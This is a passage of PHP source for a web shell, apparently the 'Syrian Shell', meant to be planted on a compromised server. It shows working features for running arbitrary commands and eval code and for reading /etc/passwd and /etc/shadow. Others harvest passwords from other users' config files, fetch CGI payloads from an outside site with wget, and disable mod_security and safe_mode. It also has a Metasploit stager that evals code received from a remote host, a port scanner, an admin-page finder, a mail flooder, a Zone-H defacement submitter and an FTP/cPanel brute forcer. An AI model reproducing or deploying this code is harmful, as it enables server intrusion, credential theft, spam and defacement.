961 PostgreSQL = ".PostgreSQL()."
962 Oracle = ".Oracle()."
963 Server Name = <sy>".$_SERVER['HTTP_HOST']." </sy>
964 Server Admin = <sy>".$_SERVER['SERVER_ADMIN']." </sy>
965<br>
966 Dis_Functions = <sy>". DisableFunctions()." </sy><br>
967 Your IP = <sy>".GetRealIP()." </sy>
968 Server IP = <sy><a href='http://bing.com/search?q=ip:".$serverIP."&go=&form=QBLH&filt=all' target=\"_blank\">".gethostbyname($_SERVER["HTTP_HOST"])."
969
970</sy></a>
971[</span><a href=http://www.yougetsignal.com/tools/web-sites-on-web-server target=\"_blank\"/>Reverse IP</a>]</span>
972 Date Time = <sy>".date('Y-m-d H:i:s')." </sy><br/>
973
974[<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
975[<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1 Cracker</a>]
976[<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM Cracker</a>]
977<br>
978<br>
979<table bgcolor=#cccccc width=\"100%\"><tbody><tr>
980<td align=right width=100><p dir=ltr>
981<sy> Server : <br>
982<b>uname -a :
983<br>pwd : </span> <br>ID : </span> <br></b></sy></td><td>
984<p dir=ltr><font color=#cccccc size=-2><b> ".$server."
985<br> ".$uname." <sy><a href=http://www.google.com/search?q=".urlencode(@php_uname())." target=_blank>[Google]</a></sy><br> ".
986
987$dir."<br> ".Exe('id')."</b>
988</font></td></tr></tbody>
989</table>
990 [<a href='#down'>Down</a>]
991 [<a href='javascript:window.print()'>Print</a>]
992</table>";
993
994# ---------------------------------------#
995# Main Page #
996#----------------------------------------#
997if ($_GET['id']== 'mainPage')
998{
999 echo "<form method='post'><table width=100% border=1><tr><td>
1000 <textarea name='ExecutionArea' rows=10 cols=152 style='color=red'>";
1001
1002 if(!$_POST || $_POST['login']) // Show Current Directory Contents if No Post in requesting ...
1003 {
1004 @chdir($_POST['directory']);
1005 if($os == "Windows")
1006 {
1007 echo Exe('dir');
1008 }
1009 else if($os == "Linux")
1010 {
1011 echo Exe('ls');
1012 }
1013 }
1014 else if($_POST['submitCommands']) // Execute The Alias Command .
1015 {
1016 echo Exe($_POST['alias']);
1017 }
1018 else if($_POST['Execute']) // Execute The Command From Command Line .
1019 {
1020 @chdir($_POST['directory']);
1021 if(empty($_POST['cmd']))
1022 {
1023 if($os == "Windows")
1024 {
1025 echo Exe('dir');
1026 }
1027 else if($os == "Linux")
1028 {
1029 echo Exe('ls -lia');
1030 }
1031 }
1032 else
1033 {
1034 echo Exe($_POST['cmd']);
1035 }
1036 }
1037 else if($_POST['submitEval']) // Execute Eval Code .
1038 {
1039 $eval = @str_replace("<?php","",$_POST['php_eval']);
1040 $eval = @str_replace("<?php","",$eval);
1041 $eval = @str_replace("?>","",$eval);
1042 $eval = @str_replace("\\","",$eval);
1043 echo eval($eval);
1044 }
1045 # --------------------------
1046 # Hash Analyzer
1047 #---------------------------
1048 else if($_POST['analyzieNow'])
1049 {
1050 $hash = $_POST['hashToAnalyze'];
1051 $subHash = substr($hash,0,3);
1052 if($subHash =='$ap' && strlen($hash) == 37)
1053 {
1054 echo "The Hash : ".$hash." is : MD5(APR) Hash";
1055 }
1056 else if($subHash =='$1$' && strlen($hash) == 34)
1057 {
1058 echo "The Hash : ".$hash." is : MD5(UNIX) Hash";
1059 }
1060 else if($subHash =='$H$' && strlen($hash) == 35)
1061 {
1062 echo "The Hash : ".$hash." is : MD5(phpBB3) Hash";
1063 }
1064 else if(strlen($hash) == 29)
1065 {
1066 echo "The Hash : ".$hash." is : MD5(Wordpress) Hash";
1067 }
1068 else if($subHash =='$5$' && strlen($hash) == 64)
1069 {
1070 echo "The Hash : ".$hash." is : SHA256(UNIX) Hash";
1071 }
1072 else if($subHash =='$6$' && strlen($hash) == 128)
1073 {
1074 echo "The Hash : ".$hash." is : SHA512(UNIX) Hash";
1075 }
1076 else if(strlen($hash) == 56)
1077 {
1078 echo "The Hash : ".$hash." is : SHA224 Hash";
1079 }
1080 else if(strlen($hash) == 64)
1081 {
1082 echo "The Hash : ".$hash." is : SHA256 Hash";
1083 }
1084 else if(strlen($hash) == 96)
1085 {
1086 echo "The Hash : ".$hash." is : SHA384 Hash";
1087 }
1088 else if(strlen($hash) == 128)
1089 {
1090 echo "The Hash : ".$hash." is : SHA512 Hash";
1091 }
1092 else if(strlen($hash) == 40)
1093 {
1094 echo "The Hash : ".$hash." is : MySQL v5.x Hash";
1095 }
1096 else if(strlen($hash) == 16)
1097 {
1098 echo "The Hash : ".$hash." is : MySQL Hash";
1099 }
1100 else if(strlen($hash) == 13)
1101 {
1102 echo "The Hash : ".$hash." is : DES(Unix) Hash";
1103 }
1104 else if(strlen($hash) == 32)
1105 {
1106 echo "The Hash : ".$hash." is : MD5 Hash";
1107 }
1108 else if(strlen($hash) == 4)
1109 {
1110 echo "The Hash : ".$hash." is : [CRC-16]-[CRC-16-CCITT]-[FCS-16]";}
1111 else
1112 {
1113 echo "Error : Can't Detect Hash Type";
1114 }
1115 }
1116 # --------------------------
1117 # Show Users
1118 #---------------------------
1119 else if($_POST['showUsers'])
1120 {
1121 function showUsers()
1122 {
1123
1124 if($rows = Exe('cat /etc/passwd'))
1125 {
1126 echo $rows;
1127 }
1128 elseif($rows= Exe('cat /etc/domainalias'))
1129 {
1130 echo $rows;
1131 }
1132 elseif($rows= Exe('cat /etc/shadow'))
1133 {
1134 echo $rows;
1135 }
1136 elseif($rows= Exe('cat /var/mail'))
1137 {
1138 echo $rows;
1139 }
1140 elseif($rows= Exe('cat /etc/valiases'))
1141 {
1142 echo $rows;
1143 }
1144 else { echo "[-] Can't Show Users :( ... Sorry ";}
1145 }
1146 showUsers();
1147 }
1148 # --------------------------
1149 # Generate perl
1150 #---------------------------
1151 else if($_POST['generatePel'])
1152 {
1153 @chdir($_POST["cgiperlPath"]);
1154 @mkdir("cgi", 0755);
1155 @chdir("cgi");
1156 Exe('wget http://www.syrian-shell.com/cgiPerl/cgiPerl.sy3.zip');
1157 Exe('unzip cgiPerl.sy3.zip');
1158 @unlink('cgiPerl.sy3.zip');
1159 @chmod("cgiPerl.sy3",0755);
1160 @chmod("compiler",0777);
1161 $cgi_h = fopen('.htaccess','w+');
1162 @fwrite($cgi_h,'AddHandler cgi-script .sy3');
1163 echo '
1164cgi.sy3 & .htaccess Has Been Created in [ cgi ] Directory
1165Password Is : sy34' ;
1166 }
1167 # --------------------------
1168 # Generate Server
1169 #---------------------------
1170 else if($_POST['generateSER'])
1171 {
1172 @chdir($_POST['ShourtCutPath']);
1173 @mkdir("allserver", 0755);
1174 @chdir("allserver");
1175 Exe("ln -s / allserver");
1176 GenerateFile(".htaccess","
1177 Options Indexes FollowSymLinks
1178 DirectoryIndex ssssss.htm
1179 AddType txt .php
1180 AddHandler txt .php");
1181 echo 'Now Go to allserver folder '.$_POST['ShourtCutPath'].'' ;
1182 }
1183 # --------------------------
1184 # Change Mode
1185 #---------------------------
1186 else if($_POST['changePermission'])
1187 {
1188 $ch_ok = @chmod($_POST['fileName'],$_POST['per']);
1189 if($ch_ok)
1190 echo "Permission Changed Successfully ! " ;
1191 else echo "Changing Is Not Allowed Or The File is not Exist !";
1192 }
1193 # --------------------------
1194 # Generate Users
1195 #---------------------------
1196 else if($_POST['GenerateUsers'])
1197 {
1198 @chdir($_POST['usersPath']);
1199 @mkdir("users", 0755);
1200 @chdir('users');
1201 Exe('wget http://www.syrian-shell.com/usersAndDomains/users.rar');
1202 Exe('mv users.rar users.sy3');
1203 @chmod('users.sy3',0755 );
1204 $user_h = fopen('.htaccess','w+');
1205 fwrite($user_h,'AddHandler cgi-script .sy3');
1206 echo "users.sy3 & .htaccess Has Been Created in [ users ] Directory" ;
1207 }
1208 # --------------------------
1209 # Forbidden
1210 #---------------------------
1211 else if($_POST['generateForbidden'])
1212 {
1213 @chdir($_POST['forbiddenPath']);
1214 @mkdir('forbidden');
1215 @chdir('forbidden');
1216 $htaccess = fopen('.htaccess','w+');
1217 if($_POST['403'] == 'DirectoryIndex')
1218 {
1219 fwrite($htaccess,"DirectoryIndex in.txt");
1220 }
1221 elseif($_POST['403'] == 'HeaderName')
1222 {
1223 fwrite($htaccess,"HeaderName in.txt");
1224 }
1225 elseif($_POST['403'] == 'TXT')
1226 {
1227 fwrite($htaccess,"
1228 Options Indexes FollowSymLinks
1229 addType txt .php
1230 AddHandler txt .php");
1231 }
1232 elseif($_POST['403'] == '404')
1233 {
1234 fwrite($htaccess,"
1235 ErrorDocument 404 /404.html
1236 404.html = Symlinked in.txt ");
1237 }
1238 elseif($_POST['403'] == 'ReadmeName')
1239 {
1240 fwrite($htaccess,"ReadmeName in.txt");
1241 }
1242 elseif($_POST['403'] == 'footerName')
1243 {
1244 fwrite($htaccess,"footerName in.txt");
1245 }
1246 echo "
1247Now Go To [ forbidden ] Dir And Then make The Shortcut [ in.txt ]
1248EX : ln -s /home/user/public_html/config.php in.txt";
1249 }
1250 # --------------------------
1251 # Upload Files
1252 #---------------------------
1253 else if($_POST['UploadNow'])
1254 {
1255 $nbr_uploaded =0;
1256 $files_uploded = array();
1257 $path= '';
1258 $target_path= $path . basename($_FILES['uploadfile']['name'][$i]);
1259 for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++)
1260 {
1261 if($_FILES['uploadfile']['name'][$i] != '')
1262 {
1263 move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $target_path . $_FILES['uploadfile']['name'][$i]);
1264 $files_uploded[] = $_FILES['uploadfile']['name'][$i];
1265 $nbr_uploaded++;
1266 echo "The File ".basename($_FILES['uploadfile']['name'][$i])." Uploaded Successfully !
1267";
1268 }
1269 else "The File ".basename($_FILES['uploadfile']['name'][$i])." Can't Be Upload :( !";
1270 }
1271 }
1272 # --------------------------
1273 # no Security
1274 #---------------------------
1275 else if($_POST['phpiniGenerate'])
1276 {
1277 GenerateFile("php.ini","
1278 safe_mode = Off
1279 disable_functions = NONE
1280 safe_mode_gid = OFF
1281 open_basedir = OFF");
1282 echo "php.ini Has Been Generated Successfully";
1283 }
1284 else if($_POST['htaccessGenerate'])
1285 {
1286 GenerateFile(".htaccess","
1287 <IfModule mod_security.c>
1288 SecFilterEngine Off
1289 SecFilterScanPOST Off
1290 SecFilterCheckURLEncoding Off
1291 SecFilterCheckCookieFormat Off
1292 SecFilterCheckUnicodeEncoding Off
1293 SecFilterNormalizeCookies Off
1294 </IfModule>
1295 SetEnv PHPRC ".getcwd()."php.ini
1296 suPHP_ConfigPath ".getcwd()."php.ini
1297 ");
1298 echo ".htaccess Has Been Generated Successfully ";
1299 }
1300 else if($_POST['iniphpGenerate'])
1301 {
1302 GenerateFile("ini.php","
1303 ini_restore(\"safe_mode\");
1304 ini_restore(\"open_basedir\");
1305 ");
1306 echo "ini.php Has Been Generated Successfully";
1307 }
1308 # --------------------------
1309 # Reading Files
1310 #---------------------------
1311 else if($_POST['read'] || $_POST['show'])
1312 {
1313 $file = $_POST['file'];
1314 $file = str_replace('\\\\','\\',$file);
1315
1316 if($_POST['read'])
1317 {
1318 $openMyFile = fopen($file,'r');
1319 if(function_exists('fread'))
1320 {
1321 echo fread($openMyFile,100000);
1322 }
1323 elseif(function_exists('fgets'))
1324 {
1325 echo fgets($openMyFile);
1326 }
1327 elseif(function_exists('readfile'))
1328 {
1329 echo readfile($openMyFile);
1330 }
1331 elseif(function_exists('file_get_contents'))
1332 {
1333 $readMyFile = @file_get_contents($file, NULL, NULL, 0, 1000000);
1334 var_dump($readMyFile);
1335 }
1336 elseif(function_exists('file'))
1337 {
1338 $readMyFile = file($myFile);
1339 foreach ($readMyFile as $line_num => $readMyFileLine)
1340 {
1341 echo "Line #$line_num : " . $readMyFileLine . "
1342 ";
1343 }
1344 }
1345 elseif(Exe("'cat ".$file."'"))
1346 {
1347 echo Exe("'cat ".$file."'");
1348 }
1349 elseif(function_exists('readfile'))
1350 {
1351 readfile($file);
1352 }
1353 elseif(function_exists('include'))
1354 {
1355 include($file);
1356 }
1357 elseif(function_exists('copy'))
1358 {
1359 $tmp=tempnam('','cx');
1360 copy('compress.zlib://'.$file,$tmp);
1361 $fh=fopen($tmp,'r');
1362 $data=fread($fh,filesize($tmp));
1363 fclose($fh);
1364 echo $data;
1365 }
1366 elseif(function_exists('mb_send_mail'))
1367 {
1368 if(file_exists('/tmp/mb_send_mail'))
1369 {
1370 unlink('/tmp/mb_send_mail');
1371 }
1372 @mb_send_mail(NULL, NULL, NULL, NULL,'-C $file -X /tmp/mb_send_mail');
1373 @readfile('/tmp/mb_send_mail');
1374 }
1375 else if(function_exists('curl_init'))
1376 {
1377 $fh=curl_init('file://'.$file.'');
1378 $tmp=curl_exec($fh);
1379 echo $tmp;
1380 if(strstr($file,DIRECTORY_SEPARATOR))
1381 $ch=curl_init('file:///'.$file."\x00/../../../../../../../../../../../../".__FILE__);
1382 else $ch=curl_init('file://'.$file."\x00".__FILE__);
1383 var_dump(curl_exec($ch));
1384 }
1385 else if(is_writable('.'))
1386 {
1387 file_put_contents('php.ini','safe_mode = Off');
1388 readfile($file);
1389 unlink('php.ini');
1390 }
1391 else if(is_object($ws=new COM('WScript.Shell')))
1392 {
1393 echo $exec=comshelL("type \"$file\"",$ws);
1394 }
1395 else if(checkfunctioN('win_shell_execute'))
1396 {
1397 echo winshelL("type \"$file\"");
1398 }
1399 else if(checkfunctioN('win32_create_service'))
1400 {
1401 echo srvshelL("type \"$file\"");
1402 }
1403 else if(function_exists('imap_open'))
1404 {
1405 $str=imap_open('/etc/passwd','','');
1406 $list=imap_list($str,$file,'*');
1407 for($i=0;$i<count($list);$i++)
1408 {
1409 echo $list[$i]."\n";
1410 }
1411 imap_close($str);
1412 $str=imap_open($file,'','');
1413 $tmp=imap_body($str,1);
1414 echo $tmp;
1415 imap_close($str);
1416 }
1417 elseif($file == '/etc/passwd')
1418 {
1419 for($uid=0;$uid<99999;$uid++)
1420 {
1421 $h=posix_getpwuid($uid);
1422 if(!empty($h))
1423 foreach($h as $v)
1424 echo "$v:";
1425 echo "\r\n";
1426 }
1427 }
1428 fclose($openMyFile);
1429 }
1430 elseif($_POST['show'])
1431 {
1432 $con=glob("$file*");
1433 foreach ($con as $v)
1434 {
1435 echo "$v\n";
1436 }
1437 if(function_exists('imap_open'))
1438 {
1439 $str=imap_open('/etc/passwd','','');
1440 $s=explode("|",$file);
1441 if(count($s)>1)
1442 {
1443 $list=imap_list($str,trim($s[0]),trim($s[1]));
1444 }
1445 else
1446 {
1447 $list=imap_list($str,trim($str[0]),'*');
1448 }
1449 for($i=0;$i<count($list);$i++)
1450 {
1451 imap_close($str);
1452 }
1453 }
1454 else if(is_object($ws=new COM('WScript.Shell')))
1455 {
1456 $exec=comshelL("dir \"$file\"",$ws);
1457 $exec=str_replace("\t",'',$exec);
1458 echo $exec;
1459 }
1460 else if(checkfunctioN('win_shell_execute'))
1461 {
1462 echo winshelL("dir \"$file\"");
1463 }
1464 else if(checkfunctioN('win32_create_service'))
1465 {
1466 echo srvshelL("dir \"$file\"");
1467 }
1468 }
1469
1470 }
1471 # --------------------------
1472 # Encryption
1473 #---------------------------
1474 elseif($_POST['encryptNow'])
1475 {
1476 if(!empty($_POST['ENCRYPTION']))
1477 {
1478 $md5 = $_POST['ENCRYPTION'];
1479 echo "
1480MD5 : ".md5($md5)."
1481Base64 Encode : ".base64_encode($md5)."
1482Base64 Decode : ".base64_decode($md5)."
1483Crypt : ".crypt($md5)."
1484SHA1 : ".sha1($md5)."
1485MD4 : ".hash("md4",$md5)."
1486SHA256 : ".hash("sha256",$md5)."
1487URL Encoding : ".urlencode($md5)."
1488URL Decoding : ".str_hex($md5)."
1489CRC32 : ".crc32($md5)."
1490Length : ".strlen($md5)."";
1491 }
1492 else
1493 {
1494 echo "Please Put At Least One Char !";
1495 }
1496 }
1497 # --------------------------
1498 # Metasploit RC
1499 #---------------------------
1500 else if($_POST['metaConnect'])
1501 {
1502 $ip = $_POST['ip'];
1503 $port = $_POST['port'];
1504 if ($ip == "" && $port == "")
1505 {
1506 echo "Please fill IP Adress & The listen Port";
1507 }
1508 else
1509 {
1510 $ipaddr = $ip;
1511 $port = $port;
1512 if (FALSE !== strpos($ipaddr, ":"))
1513 {
1514 $ipaddr = "[". $ipaddr ."]";
1515 }
1516 if (is_callable('stream_socket_client'))
1517 {
1518 $msgsock = @stream_socket_client("tcp://{$ipaddr}:{$port}");
1519 if (!$msgsock)
1520 {
1521 die();
1522 }
1523 $msgsock_type = 'stream';
1524 }
1525 elseif (is_callable('fsockopen'))
1526 {
1527 $msgsock = fsockopen($ipaddr,$port);
1528 if (!$msgsock)
1529 {
1530 die();
1531 }
1532 $msgsock_type = 'stream';
1533 }
1534 elseif (is_callable('socket_create'))
1535 {
1536 $msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
1537 $res = socket_connect($msgsock, $ipaddr, $port);
1538 if (!$res)
1539 {
1540 die();
1541 }
1542 $msgsock_type = 'socket';
1543 }
1544 else
1545 {
1546 die();
1547 }
1548 switch ($msgsock_type)
1549 {
1550 case 'stream': $len = fread($msgsock, 4); break;
1551 case 'socket': $len = socket_read($msgsock, 4); break;
1552 }
1553 if (!$len)
1554 {
1555 die();
1556 }
1557 $a = unpack("Nlen", $len);
1558 $len = $a['len'];
1559 $buffer = '';
1560 while (strlen($buffer) < $len)
1561 {
1562 switch ($msgsock_type)
1563 {
1564 case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer));
1565 break;
1566 case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));
1567 break;
1568 }
1569 }
1570 eval($buffer);
1571 echo "[*] Connection Terminated";
1572 die();
1573 }
1574 }
1575 # --------------------------
1576 # Scan Ports
1577 #---------------------------
1578 else if($_POST['submitDomainToScanPort'])
1579 {
1580 $domainToScan = $_POST['domainToScanPort'];
1581 if(!$domainToScan)
1582 {
1583 echo "[-] Enter IP Address Or Domain To Scan";
1584 }
1585 else
1586 {
1587 for($i=0;$i<1024;$i++)
1588 {
1589 $fp = @fsockopen($domainToScan,$i,$errno,$errstr,10);
1590 if($fp)
1591 {
1592 echo "[+] port " . $i . " open on " . $domainToScan . "
1593";
1594 }
1595 else
1596 {
1597 echo "[+] port " . $i . " closed on " . $domainToScan . "
1598";
1599 }
1600 flush();
1601 }
1602 fclose($fp);
1603 }
1604 }
1605
1606 if (isset($_POST["submit_lol"]))
1607 {
1608 set_time_limit(0);
1609 $url = $_POST['hash_lol'];
1610 echo "Testing ".$url."\n";
1611 $extention = $_POST['extention'];
1612 $adminlocales = array(
1613"admin/",
1614"wp-admin/",
1615"administration/",
1616"administrator/",
1617"moderator/",
1618"webadmin/",
1619"adminarea/",
1620"bb-admin/",
1621"adminLogin/",
1622"admin_area/",
1623"panel-administracion/",
1624"instadmin/",
1625"memberadmin/",
1626"administratorlogin/",
1627"adm/",
1628"siteadmin/login".$extention."",
1629"admin/account".$extention."",
1630"admin/index".$extention."",
1631"admin/login".$extention."",
1632"admin/admin".$extention."",
1633"admin_area/login".$extention."",
1634"admin_area/index".$extention."",
1635"admincp/index".$extention."",
1636"adminpanel".$extention."",
1637"webadmin".$extention."",
1638"webadmin/index".$extention."",
1639"webadmin/login".$extention."",
1640"admin/admin_login".$extention."",
1641"admin_login".$extention."",
1642"panel-administracion/login".$extention."",
1643"admin_area/admin".$extention."",
1644"bb-admin/index".$extention."",
1645"bb-admin/login".$extention."",
1646"bb-admin/admin".$extention."",
1647"admin/home".$extention."",
1648"pages/admin/admin-login".$extention."",
1649"admin/admin-login".$extention."",
1650"admin-login".$extention."",
1651"admin/adminLogin".$extention."",
1652"home".$extention."",
1653"adminarea/index".$extention."",
1654"admin/controlpanel".$extention."",
1655"admin".$extention."",
1656"admin/cp".$extention."",
1657"cp".$extention."",
1658"adminpanel.php",
1659"moderator".$extention."",
1660"administrator/index".$extention."",
1661"administrator/login".$extention."",
1662"user".$extention."",
1663"administrator/account".$extention."",
1664"administrator".$extention."",
1665"login".$extention."",
1666"modelsearch/login".$extention."",
1667"moderator/login".$extention."",
1668"panel-administracion/admin".$extention."",
1669"admincontrol/login".$extention."",
1670"adm/index".$extention."",
1671"moderator/admin".$extention."",
1672"account".$extention."",
1673"controlpanel".$extention."",
1674"admincontrol".$extention."",
1675"webadmin/admin".$extention."",
1676"adminLogin".$extention."",
1677"panel-administracion/login".$extention."",
1678"wp-login".$extention."",
1679"adminLogin".$extention."",
1680"admin/adminLogin".$extention."",
1681"adminarea/index".$extention."",
1682"adminarea/admin".$extention."",
1683"adminarea/login".$extention."",
1684"panel-administracion/index".$extention."",
1685"modelsearch/index".$extention."",
1686"modelsearch/admin".$extention."",
1687"adm/admloginuser".$extention."",
1688"admloginuser".$extention."",
1689"admin2".$extention."",
1690"admin2/login".$extention."",
1691"admin2/index".$extention."",
1692"adm/index".$extention."",
1693"adm".$extention."",
1694"affiliate".$extention."",
1695"adm_auth".$extention."",
1696"memberadmin".$extention."",
1697"administratorlogin".$extention."");
1698 foreach ($adminlocales as $admin)
1699 {
1700 $headers = @get_headers("$url$admin");
1701 if (@eregi('200', $headers[0]))
1702 {
1703 echo "[+] $url$admin ~ Found!\n";
1704 }
1705
1706 }
1707 }
1708 # --------------------------
1709 # Config Finder
1710 #---------------------------
1711 else if($_POST['configFinderSubmit'])
1712 {
1713 set_time_limit(0);
1714 $passwd=fopen('/etc/passwd','r');
1715 if (!$passwd)
1716 {
1717 echo "[-] Error : coudn't read /etc/passwd";
1718 exit;
1719 }
1720 $path_to_public=array();
1721 $users=array();
1722 $pathtoconf=array();
1723 $i=0;
1724 while(!feof($passwd))
1725 {
1726 $str=fgets($passwd);
1727 if ($i>35)
1728 {
1729 $pos=strpos($str,":");
1730 $username=substr($str,0,$pos);
1731 $dirz="/home/$username/public_html/";
1732 if (($username!=""))
1733 {
1734 if (is_readable($dirz))
1735 {
1736 array_push($users,$username);
1737 array_push($path_to_public,$dirz);
1738 }
1739 }
1740 }
1741 $i++;
1742 }
1743 echo "";
1744 echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd
1745 ";
1746 echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories
1747 ";
1748 echo "[~] Searching for passwords in config.* files...
1749 ";
1750 foreach ($users as $user)
1751 {
1752 $path="/home/$user/public_html/";
1753 read_dir($path,$user);
1754 }
1755 echo "[+] Done";
1756 }
1757 # --------------------------
1758 # Mail Storm
1759 #---------------------------
1760 else if($_POST['sendMailStorm'])
1761 {
1762 $to=$_POST['to'];
1763 $nom=$_POST['nom'];
1764 $Comments=$_POST['Comments'];
1765 if ($to <> "" )
1766 {
1767 for ($i = 0; $i < $nom ; $i++)
1768 {
1769 $from = rand (71,1020000000)."@"."Attacker.com";
1770 $subject= md5("$from");
1771 if(@mail($to,$subject,$Comments,"From:$from"))
1772 echo "[+] $i spammed !!
1773";
1774 else
1775 {
1776 echo "[-] $i Failed !!
1777";
1778 }
1779 }
1780 }
1781 }
1782 # --------------------------
1783 # Extract Emails
1784 #---------------------------
1785 else if($_POST['getEmails'])
1786 {
1787 $emhost = $_POST['EM_HOST'];
1788 $emuser = $_POST['EM_USER'];
1789 $empass = $_POST['EM_PASS'];
1790 $emdb = $_POST['EM_DB'];
1791 $emtab = $_POST['EM_TABLE'];
1792 $emcol = $_POST['EM_COLUMN'];
1793 $try2Connect = @mysql_connect($emhost,$emuser,$empass);
1794 if(!$try2Connect)
1795 {
1796 echo "[-] Can't Connect To DB !! [ user name || password is wrong ! ] .
1797";
1798 }
1799 $try2Select = @mysql_select_db($emdb);
1800 if(!$try2Select && $try2Connect)
1801 {
1802 echo "[-] DB Name is Wrong !! . ";
1803 }
1804 $sql = @mysql_query("SELECT * FROM $emtab");
1805 while ($res = @mysql_fetch_array($sql))
1806 {
1807 echo ''.$res["$emcol"].'
1808';
1809 }
1810 }
1811 // Help
1812 else if($_POST['emailExtractorHelp'])
1813 {
1814 echo "This is Some Tables Name & Columns Name For Some Fam Scripts ..
1815
1816[+] VBulletin
1817Table-name : user
1818column-name : email
1819
1820[+] WordPress
1821Table-name : wp_users
1822column-name : user_email
1823
1824[+] Joomla
1825Table-name : jos_users
1826column-name : email
1827
1828[+] PHPBB
1829Table-name : phpbb_users
1830column-name : user_email
1831
1832[+] I.P.Board
1833Table-name : ibf_members
1834column-name : email
1835
1836[+] SMF
1837Table-name : smf_members
1838column-name : emailAddress ";
1839 }
1840 # --------------------------
1841 # MySQL Query
1842 #---------------------------
1843 else if($_POST['MySQLQuery'])
1844 {
1845 $qu_host =$_POST['QU_HOST'];
1846 $qu_user =$_POST['QU_USER'];
1847 $qu_pass =$_POST['QU_PASS'];
1848 $qu_db =$_POST['QU_DB'];
1849 $query =$_POST['QU'];
1850 if (empty($_POST['QU_HOST']))
1851 $qu_host = 'localhost';
1852 $query = str_replace("\\","",$query);
1853 if (!empty($_POST['QU']))
1854 {
1855 $tryConnection = @mysql_connect($qu_host,$qu_user,$qu_pass);
1856 if(!$tryConnection)
1857 {
1858 echo "[-] Unable TO Connect DATABASE ! Username Or Password Is Wrong !!";
1859 }
1860 else
1861 {
1862 $selectDB = @mysql_select_db($qu_db);
1863 if(!$selectDB)
1864 {
1865 echo "[-] Database Name Is Wrong !!";
1866 }
1867 else
1868 {
1869 $qqok1 = mysql_query($query);
1870 if(!$qqok1)
1871 {
1872 echo "[-] Can't Execute The Query";
1873 }
1874 }
1875 }
1876 @mysql_close();
1877 }
1878 if ($qqok1)
1879 {
1880 update();
1881 }
1882 }
1883 # --------------------------
1884 # SQL Reader
1885 #---------------------------
1886 else if ($_POST['sql2Read'])
1887 {
1888 $host = $_POST['host'];
1889 $user = $_POST['user'];
1890 $pass = $_POST['pass'];
1891 $db = $_POST['db'];
1892 $unique = uniqid('N');
1893 $file = $_POST['file'];
1894 $file = str_replace('\\\\','\\',$file);
1895 $query = array(
1896 "CREATE TEMPORARY TABLE $unique (file LONGBLOB)",
1897 "LOAD DATA INFILE '".mysql_real_escape_string($file)."' INTO TABLE $unique",
1898 "SELECT * FROM $unique"
1899 );
1900 $connect = mysql_connect($host,$user, $pass);
1901 mysql_select_db($db,$connect);
1902 foreach($query as $Allqueries)
1903 {
1904 $mysqlQuery = mysql_query($Allqueries,$connect);
1905 while($line = @mysql_fetch_row($mysqlQuery))
1906 echo htmlspecialchars($line[0]);
1907 echo "\n";
1908 }
1909 }
1910 # --------------------------
1911 # Edit File
1912 #---------------------------
1913 else if($_POST['editFileSubmit'])
1914 {
1915 $file2Edit = $_POST['editFile'];
1916 echo @file_get_contents($file2Edit);
1917 }
1918 else if($_POST['saveEditedFile'])
1919 {
1920 $fileName = $_POST['file2edit'];
1921 $newFile = $_POST['ExecutionArea'];
1922 $trytoGenerate = GenerateFile($fileName,$newFile);
1923 if($trytoGenerate)
1924 {
1925 echo "[+] File Saved !";
1926 }
1927 else
1928 {
1929 echo "[-] Failed To Save File !!";
1930 }
1931 }
1932 # --------------------------
1933 # Zone H Attacker
1934 #---------------------------
1935 else if($_POST['SendNowToZoneH'])
1936 {
1937 ob_start();
1938 $sub = @get_loaded_extensions();
1939 if(!in_array("curl", $sub))
1940 {
1941 die('[-] Curl Is Not Supported !! ');
1942 }
1943
1944 $hacker = $_POST['defacer'];
1945 $method = $_POST['hackmode'];
1946 $neden = $_POST['reason'];
1947 $site = $_POST['domain'];
1948
1949 if (empty($hacker))
1950 {
1951 die ("[-] You Must Fill the Attacker name !");
1952 }
1953 elseif($method == "--------SELECT--------")
1954 {
1955 die("[-] You Must Select The Method !");
1956 }
1957 elseif($neden == "--------SELECT--------")
1958 {
1959 die("[-] You Must Select The Reason");
1960 }
1961 elseif(empty($site))
1962 {
1963 die("[-] You Must Inter the Sites List ! ");
1964 }
1965 $i = 0;
1966 $sites = explode("\n", $site);
1967 while($i < count($sites))
1968 {
1969 if(substr($sites[$i], 0, 4) != "http")
1970 {
1971 $sites[$i] = "http://".$sites[$i];
1972 }
1973 ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
1974 echo "Site : ".$sites[$i]." Defaced !\n";
1975 ++$i;
1976 }
1977 echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";
1978 }
1979 # --------------------------
1980 # FTP And Cpanle Brute Force Attacker
1981 #---------------------------
1982 else if($_POST['BruteForceCpanelAndFTP'])
1983 {
1984 $connect_timeout=5;
1985 set_time_limit(0);
1986 $submit=$_REQUEST['BruteForceCpanelAndFTP'];
1987 $users=$_REQUEST['users'];
1988 $pass=$_REQUEST['passwords'];
1989 $target=$_REQUEST['target'];
1990 $cracktype=$_REQUEST['cracktype'];
1991
1992 if(empty($target))
1993 {
1994 $target = "localhost";
1995 }
1996
1997 function ftp_check($host,$user,$pass,$timeout)
1998 {
1999 $ch = curl_init();
2000 curl_setopt($ch, CURLOPT_URL, "ftp://$host");
2001 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2002 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
2003 curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
2004 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
2005 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
2006 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
2007 $data = curl_exec($ch);
2008 if ( curl_errno($ch) == 28 )
2009 {
2010 print "Error : Connection Timeout Please Check The Target Hostname .";
2011 exit;
2012 }
2013 elseif ( curl_errno($ch) == 0 )
2014 {
2015 print "[+] Cracking Success With Username ($user) and Password ($pass)";
2016 }
2017 curl_close($ch);
2018 }
2019 function cpanel_check($host,$user,$pass,$timeout)
2020 {
